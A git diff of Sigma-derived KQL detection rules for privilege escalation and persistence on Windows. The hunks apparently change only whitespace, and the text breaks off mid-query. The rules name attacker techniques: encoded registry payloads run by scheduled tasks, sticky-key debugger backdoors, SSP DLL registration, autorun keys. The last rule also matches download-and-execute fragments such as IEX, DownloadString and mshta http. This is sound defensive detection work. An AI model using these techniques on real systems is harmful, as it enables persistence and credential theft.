a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql index 48a2d5d9..f2416006 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql @@ -1,12 +1,12 @@ -// Title: Scheduled Task Executing Encoded Payload from Registry -// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-02-12 -// Level: high -// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Scheduled Task Executing Encoded Payload from Registry +// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-12 +// Level: high +// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql index 9da4b61e..286baa0c 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql @@ -1,10 +1,10 @@ -// Title: Scheduled Task Executing Payload from Registry -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-18 -// Level: medium -// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 - -DeviceProcessEvents +// Title: Scheduled Task Executing Payload from Registry +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql index 8aa8670e..ee1cc60f 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql @@ -1,13 +1,13 @@ -// Title: Scheduled Task/Job At -// Author: Ömer Günal, oscd.community -// Date: 2020-10-06 -// Level: low -// Description: Detects the use of at/atd which are utilities that are used to schedule tasks. -// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Scheduled Task/Job At +// Author: Ömer Günal, oscd.community +// Date: 2020-10-06 +// Level: low +// Description: Detects the use of at/atd which are utilities that are used to schedule tasks. +// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/at" or FolderPath endswith "/atd" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql index 9b54a51a..8358e184 100644 --- a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql +++ b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql @@ -1,10 +1,10 @@ -// Title: Scheduled TaskCache Change by Uncommon Program -// Author: Syed Hasan (@syedhasan009) -// Date: 2021-06-18 -// Level: high -// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005 - -DeviceRegistryEvents +// Title: Scheduled TaskCache Change by Uncommon Program +// Author: Syed Hasan (@syedhasan009) +// Date: 2021-06-18 +// Level: high +// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005 + +DeviceRegistryEvents | where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*" and (not((RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor*") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or isnull(RegistryValueData) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", "C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe")) or (RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe" or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql index ae15f223..59754001 100644 --- a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql +++ b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql @@ -1,10 +1,10 @@ -// Title: Schtasks Creation Or Modification With SYSTEM Privileges -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-28 -// Level: high -// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 - -DeviceProcessEvents +// Title: Schtasks Creation Or Modification With SYSTEM Privileges +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: high +// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 + +DeviceProcessEvents | where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or (ProcessCommandLine contains "Subscription Heartbeat" and ProcessCommandLine contains "\\HeartbeatConfig.xml" and ProcessCommandLine contains "\\Microsoft Shared\\OFFICE") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql index 3acf421e..8442867e 100644 --- a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql +++ b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql @@ -1,10 +1,10 @@ -// Title: Schtasks From Suspicious Folders -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-15 -// Level: high -// Description: Detects scheduled task creations that have suspicious action command and folder combinations -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 - -DeviceProcessEvents +// Title: Schtasks From Suspicious Folders +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-15 +// Level: high +// Description: Detects scheduled task creations that have suspicious action command and folder combinations +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 + +DeviceProcessEvents | where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql index 807837c3..5d816a7e 100644 --- a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql +++ b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql @@ -1,10 +1,10 @@ -// Title: Security Privileges Enumeration Via Whoami.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2021-05-05 -// Level: high -// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.discovery, attack.t1033 - -DeviceProcessEvents +// Title: Security Privileges Enumeration Via Whoami.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-05 +// Level: high +// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1033 + +DeviceProcessEvents | where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql index 705f8198..46cb2c04 100644 --- a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql +++ b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql @@ -1,10 +1,10 @@ -// Title: Security Support Provider (SSP) Added to LSA Configuration -// Author: iwillkeepwatch -// Date: 2019-01-18 -// Level: high -// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005 - -DeviceRegistryEvents +// Title: Security Support Provider (SSP) Added to LSA Configuration +// Author: iwillkeepwatch +// Date: 2019-01-18 +// Level: high +// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005 + +DeviceRegistryEvents | where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql index f436c7d2..1a5cf50c 100644 --- a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Session Manager Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Session Manager Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql index f6d0eeb2..cf991af5 100644 --- a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql +++ b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql @@ -1,14 +1,14 @@ -// Title: Setup16.EXE Execution With Custom .Lst File -// Author: frack113 -// Date: 2024-12-01 -// Level: medium -// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. -// These ".lst" file can contain references to external program that "Setup16.EXE" will execute. -// Attackers and adversaries might leverage this as a living of the land utility. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005 -// False Positives: -// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare. - -DeviceProcessEvents +// Title: Setup16.EXE Execution With Custom .Lst File +// Author: frack113 +// Date: 2024-12-01 +// Level: medium +// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. +// These ".lst" file can contain references to external program that "Setup16.EXE" will execute. +// Attackers and adversaries might leverage this as a living of the land utility. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005 +// False Positives: +// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare. + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains " -m " and InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe") and (not(FolderPath startswith "C:\\~MSSETUP.T\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql index 7560d036..06004f00 100644 --- a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql +++ b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql @@ -1,12 +1,12 @@ -// Title: Startup Folder File Write -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: medium -// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate - -DeviceFileEvents +// Title: Startup Folder File Write +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate + +DeviceFileEvents | where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql index 37ffef1f..9b6355fc 100644 --- a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql +++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql @@ -1,12 +1,12 @@ -// Title: Sticky Key Like Backdoor Execution -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018-03-15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Sticky Key Like Backdoor Execution +// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-15 +// Level: critical +// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql index f9739905..a1f334e0 100644 --- a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql +++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql @@ -1,12 +1,12 @@ -// Title: Sticky Key Like Backdoor Usage - Registry -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018-03-15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Sticky Key Like Backdoor Usage - Registry +// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-15 +// Level: critical +// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql index 940fd4e4..5f62d985 100644 --- a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql +++ b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Autorun Registry Modified via WMI -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-02-17 -// Level: high -// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047 -// False Positives: -// - Legitimate administrative activity or software installations - -DeviceProcessEvents +// Title: Suspicious Autorun Registry Modified via WMI +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-17 +// Level: high +// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047 +// False Positives: +// - Legitimate administrative activity or software installations + +DeviceProcessEvents | where (((ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ")) and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or InitiatingProcessFolderPath endswith "\\wmiprvse.exe")) and ((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData'" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains ":\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming" or ProcessCommandLine contains ":\\$Recycle.bin" or ProcessCommandLine contains ":\\Users\\Default" or ProcessCommandLine contains ":\\Users\\public" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%AppData%") or (ProcessCommandLine contains ":\\Users\\" and (ProcessCommandLine contains "\\Favorites" or ProcessCommandLine contains "\\Favourites" or ProcessCommandLine contains "\\Contacts" or ProcessCommandLine contains "\\Music" or ProcessCommandLine contains "\\Pictures" or ProcessCommandLine contains "\\Documents" or ProcessCommandLine contains "\\Photos"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql index fabfa3f6..6eb95c3d 100644 --- a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Command Patterns In Scheduled Task Creation -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-23 -// Level: high -// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 -// False Positives: -// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives - -DeviceProcessEvents +// Title: Suspicious Command Patterns In Scheduled Task Creation +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: high +// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives + +DeviceProcessEvents | where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or 